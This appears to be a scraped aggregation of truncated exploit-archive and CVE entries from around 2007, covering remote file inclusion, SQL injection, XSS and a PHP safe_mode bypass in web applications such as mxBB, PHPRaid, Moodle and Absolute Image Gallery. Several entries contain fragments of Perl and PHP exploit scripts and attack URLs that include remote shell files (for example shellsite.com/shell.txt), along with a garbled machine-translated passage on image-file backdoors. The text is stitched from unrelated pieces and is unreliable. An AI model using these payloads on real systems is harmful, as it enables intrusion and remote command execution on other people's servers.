mxBB Module FAQ & RULES 2.0.0 - Remote File Inclusion
!/usr/bin/php -q -d shortopentag=on cmd: a shell command ls -la Options: -pport: specify a port other than 80 -Pip:port: specify a proxy Example: php '.$argv0.' localhost http://www.shellsite.com/shell.txt ls -la -P1.1.1.1:80 shell.txt:...
CVE-2007-2020
Unspecified vulnerability in administration.php in xodagallery allows remote attackers to execute arbitrary code via the cmd parameter. NOTE: CVE disputes this vulnerability because administration.php does not use the cmd parameter for inclusion...
PT-2007-3364 · Xo Design · Xodagallery
Name of the Vulnerable Software and Affected Versions: xodagallery affected versions not specified Description: The issue allows remote attackers to execute arbitrary code via the cmd parameter in administration.php. However, it's noted that administration.php does not use the cmd parameter for...
PHPRaid 3.0.7 - rss.php?PHPraid_dir Remote File Inclusion
PHPRaid 3.0.7 - rss.php?PHPraiddir Remote File Inclusion !/usr/bin/perl phpraid cmd shell example: Exploit : http://www.example.com/phpRaidpath/rss.php?phpraiddir=Evil-script? use LWP::UserAgent; $Path = $ARGV0; $Pathtocmd = $ARGV1; $cmdv = $ARGV2; if$Path!/http:/// || $Pathtocmd!/http:/// ||...
Active PHP Bookmark Notes 0.2.5 - Remote File Inclusion
!/usr/bin/perl Active PHP Bookmark Notes 0.2.5 cmd shell example: Ex: http://localhost/apbn/templates/head.php?APBSETTINGStemplatepath=http://localhost/tryag.txt Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group use LWP::UserAgent; $Path = $ARGV0; $Pathtocmd = $ARGV1; $cmdv = $ARGV2;...
SQL injection
SQL injection vulnerability in index.php in WBBlog allows remote attackers to execute arbitrary SQL commands via the eid parameter in a viewentry cmd...
Cross site scripting
Cross-site scripting (XSS) vulnerability in index.php in WBBlog allows remote attackers to inject arbitrary web script or HTML via the eid parameter in a viewentry cmd...
CVE-2007-1481
SQL injection vulnerability in index.php in WBBlog allows remote attackers to execute arbitrary SQL commands via the eid parameter in a viewentry cmd...
CVE-2007-1482
Summary: CVE-2007-1482 is an XSS vulnerability in WBBlog’s index.php, exploited via the e_id parameter in a viewentry cmd. Affected component: WBBlog, index.php. The underlying issue is a Cross-site scripting flaw that allows remote attackers to inject arbitrary web script or HTML. Impact (as sta...
Absolute Image Gallery 2.0 (gallery.php categoryid) SQL Injection Vuln
No description provided by source. Absolute Image Gallery Gallery.ASP categoryid MSSQL Injection Exploit Type : SQL Injection Release Date : 2007-03-15 Product / Vendor : Absolute Image Gallery http://www.xigla.com/absoluteig/ Bug :...
Absolute Image Gallery 2.0 - gallery.asp?categoryId SQL Injection
Absolute Image Gallery 2.0 - gallery.asp?categoryId SQL Injection Absolute Image Gallery Gallery.ASP categoryid MSSQL Injection Exploit Type : SQL Injection Release Date : 2007-03-15 Product / Vendor : Absolute Image Gallery http://www.xigla.com/absoluteig/ Bug :...
Absolute Image Gallery 2.0 (gallery.php categoryid) SQL Injection Vuln
Exploit for asp platform in category web applications: Absolute Image Gallery 2.0 gallery.php categoryid SQL Injection Vuln. Absolute Image Gallery Gallery.A...
Absolute Image Gallery 2.0 - 'gallery.asp?categoryId' SQL Injection
Absolute Image Gallery Gallery.ASP categoryid MSSQL Injection Exploit Type : SQL Injection Release Date : 2007-03-15 Product / Vendor : Absolute Image Gallery http://www.xigla.com/absoluteig/ Bug : http://localhost/script/gallery.asp?action=viewimage&categoryid=-SQL Inj-...
CVE-2007-1429
CVE-2007-1429 affects Moodle 1.7.1, exposing remote PHP code execution via remote file inclusion. The vulnerability allows an attacker to supply a URL in the cmd parameter to either admin/utfdbmigrate.php or filter.php, leading to arbitrary code execution on the server. Multiple connected sources...
CVE-2007-1429
Multiple PHP remote file inclusion vulnerabilities in Moodle 1.7.1 allow remote attackers to execute arbitrary PHP code via a URL in the cmd parameter to (1) admin/utfdbmigrate.php or (2) filter.php...
PostNuke Module phgstats 0.5 (phgdir) Remote File Include Exploit
Exploit for unknown platform in category web applications: PostNuke Module phgstats 0.5 phgdir Remote File Include Exploit. PostNuke Module phgstats 0.5 phgdir Remote...
PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit
Exploit for unknown platform in category local exploits: PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit. Run'c:\windows\system32\cmd.exe /c...
Opera <= 9.10 Configuration Overwrite
No description provided by source. $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require...
The script pictures the back door without echo solutions-vulnerability warning-the black bar safety net
First of all, let us think about why the picture of the back door is not back obvious reason: as you know, we use the include contains picture, the interpreter will put the picture as a text document for searching and automatic parsing <% %> or <? ?> of the script. So what other html characters such...
phpBB Module NoMoKeTos Rules 0.0.1 Remote File Include Exploit
Exploit for unknown platform in category web applications: phpBB Module NoMoKeTos Rules 0.0.1 Remote File Include Exploit. !/usr/bin/perl phpBB Module NoMoKeTos Rules 0.0.1...